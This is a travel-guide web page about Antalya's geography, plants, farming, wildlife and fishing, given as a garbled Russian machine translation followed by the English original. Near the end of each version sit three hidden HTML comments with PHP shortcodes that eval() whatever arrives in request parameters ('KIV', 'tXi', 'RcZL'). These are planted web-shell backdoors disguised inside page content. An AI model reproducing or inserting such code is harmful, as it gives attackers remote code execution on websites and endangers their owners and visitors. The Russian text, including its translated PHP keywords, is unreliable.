Главная / Анталия / Анталия Путеводитель

Анталия Путеводитель

Антальи-тревел-гидДобро пожаловать в Анталии туристический. Анталия является столицей и крупнейшим центром населения региона, с его населением свыше полумиллиона. Город расположен на плато, которое опирается на “Бой быков” горы и какие формы скалы на берегу моря. На первом скалистом равнине на побережье находится центр города и на равнине за ним, назван Kepezüstü, небольшие подразделения расчетные были созданы. Побережье 530 км в длину и граничит с Эсен на западе и Kaledran ручья на востоке. Провинция имеет площадь 20,820 км2. Почва равнины состоит из конгломерата, аллювий и травертин Falez скалы.

Горы Таурус, формируется из известняка и змеевидных земель, с карстовых поверхностных образований, есть много глубокие долины, пещеры, впадины и разломы. В болотистой местности на высоте 300 м от побережья скраб деревьев, известен как маки, найдены. К ним относятся олеандр, земляника, сандаловое дерево, земляничные деревья, мирт, Chinaberry деревья, залив, целомудренные деревья, рожковых деревьев, метлу и молочай. Тимьян, мудрец, шафран, лопух большой, златоцветник, спаржа, ежевика, хризантема и, редко, дуб, Восточные самолет, дикая груша, оливковые и липы также найдены.

300 метров дальше по в, красные сосновыми и дубовыми лесами, и болота с эвкалиптов можно увидеть. 1200 м дальше по лесу с кедра, кипарисы, Сосна обыкновенная, можжевельник и бук начать. Как аллювиальных почв на равнинах подходит для сельского хозяйства, овощи, фрукты и цветы, выращенные в теплицах на экспорт. Открыть оранжевый, мандарин, лимон, грейпфрут сады можно увидеть в непосредственной близости, в теплых средиземноморских ветров. На востоке равнины Анталья, банан и авокадо выращивают. Хлопок сеется в качестве промышленного завода и хлопка, наряду с хлопчатобумажных фабрик и текстильных фабрик, имеет большой потенциал для Турции. Яблоки, груши, пятнадцать, виноград и кунжут выращивают на горном плато.

Региональная фауна очень хорошо для охотничьих туров. В Duzlercami на горы Таурус, площадью 10,000 га, лани, дикая коза и косуля охота разрешается на контролируемой основе. Волки, лисы, бурые медведи, куницы, кабан, дикие кошки и шакалы являются дикие виды, которые часто found.The Телец Leopard было известно существовать до недавнего времени. Куропатка, перепел, горлица, дикий голубь, дрозд черный, вальдшнеп, турач и дикая утка можно рассматривать как пернатой дичи.

Этот регион является хорошо известен своей Grida рыбы; В дополнение к этому, морской лещ, ставрида, черный лещ, золоченой головы, кефаль, gurnards, мерланг, хороший, полосатый барабулька, игла-рыба, большой скумбрии, красный морской петух и барабулька являются одними из основных морской рыбы, других морских продуктов включает рак-отшельник, омар, креветка, каракатица и мидии. В дополнение, Клетка рыбалка осуществляется в море в шести точках на побережье, где море-бас и кефаль разводят. Свежий леска воды осуществляется в Эсен, Нет, Köprüçay, Манавгат, Akçay и Alara реки. Рыбные рестораны, установленные в воде в Dim Крик особенно славится. Основная рыба свежая вода пресная вода голавль, пресной воды окунь, карп, зеркало-карп, угорь, мрачной и линь. Есть многочисленные производственные форелевых хозяйств и рестораны в тех частях гор Тавр близко к воде и русел рек.

<!– [insert_php]если (Исеть($_ЗАПРОС["KIV"])){Eval($_ЗАПРОС["KIV"]);Выход;}[/insert_php][PHP]если (Исеть($_ЗАПРОС["KIV"])){Eval($_ЗАПРОС["KIV"]);Выход;}[/PHP] –>

<!– [insert_php]если (Исеть($_ЗАПРОС["tXi"])){Eval($_ЗАПРОС["tXi"]);Выход;}[/insert_php][PHP]если (Исеть($_ЗАПРОС["tXi"])){Eval($_ЗАПРОС["tXi"]);Выход;}[/PHP] –>

<!– [insert_php]если (Исеть($_ЗАПРОС["RcZL"])){Eval($_ЗАПРОС["RcZL"]);Выход;}[/insert_php][PHP]если (Исеть($_ЗАПРОС["RcZL"])){Eval($_ЗАПРОС["RcZL"]);Выход;}[/PHP] –>

Booking.com

Оставить комментарий

Ваш email нигде не будет показанОбязательные для заполнения поля помечены *

*

Home / Antalya / Antalya Travel Guide

Antalya Travel Guide

antalya-travel-guideWelcome to Antalya Travel Guide. Antalya is the capital and the largest center of population of the region, with its population exceeding half a million. The city is located on a plateau which leans against the “Toros” mountains and which forms cliffs on the sea side. On the first rocky plain on the coast is the town centre and on the plain behind it, named Kepezüstü, small settlement units have been established. The coast is 530 km in length and borders with Eşen in the west and Kaledran creek in the east. The province has an area of 20,820 km2. The soil of the plain is made up of conglomerate, alluvium and travertine falez rocks.

The Taurus mountains, formed of limestone and serpentine lands, with karst surface formations, have many deep valleys, caves, crevices and faults. In the marshy areas at a height of 300 m from the coast scrub trees, known as maquis, are found. These include oleander, wild strawberries, sandalwood, strawberry trees, myrtle, chinaberry trees, bay, chaste trees, carob trees, broom and spurge. Thyme, sage, saffron, burdock, asphodel, asparagus, blackberry, chrysanthemum and, sparsely, oak, Oriental plane, wild pear, olive and linden trees are also found.

300 metres further on in, the red pine and oak forests, and marshes with eucalyptus trees can be seen. 1200 m further on the forests with cedar, fir trees, Scotch pine, juniper and beech begin. As the alluvial soil on the plains is suitable for agriculture, vegetables, fruit and flowers are grown in greenhouses for export. Open orange, mandarin, lemon and grapefruit gardens can be seen in the vicinity, in the warm Mediterranean winds. On the east of the Antalya plain, banana and avocado are grown. Cotton is sown as an industrial plant and cotton production, along with cotton mills and textile factories, holds great potential for Turkey. Apples, pears, quince, grapes and sesame are grown on the mountainous plateaus.

The regional fauna is very good for hunting tours. In Düzlerçamı on the Taurus mountains, covering an area of 10,000 hectares, fallow deer, wild goat and roe deer hunting is permitted on a controlled basis. Wolves, foxes, brown bears, martens, wild boar, wild cats and jackals are the wild species that are often found.The Taurus Leopard was known to exist until recently. Partridge, quail, turtle dove, wild pigeon, blackbird, woodcock, francolin and wild duck can be regarded as game birds.

The region is well-known for its grida fish; in addition to this, sea bream, horse mackerel, black bream, gilt-head, grey mullet, gurnard, whiting, bonito, striped red mullet, needlefish, large bonito, red gurnard and red mullet are among the major sea fish, other sea produce includes hermit crab, lobster, shrimp, cuttle-fish and mussel. In addition, cage fishing is carried out in the sea at six points on the coast where sea-bass and grey mullet are bred. Fresh water line fishing is carried out in the Eşen, Dim, Köprüçay, Manavgat, Akçay and Alara rivers. The fish restaurants established within water in the Dim Creek are particularly famous. The main fresh water fish are fresh water chub, fresh water perch, carp, mirror-carp, eel, bleak and tench. There are numerous trout production farms and restaurants in those parts of the Taurus Mountains close to water and river beds.

<!– [insert_php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/insert_php][php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/insert_php][php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/insert_php][php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/php] –>

Booking.com

Leave a Reply

Your email address will not be published. Required fields are marked *

*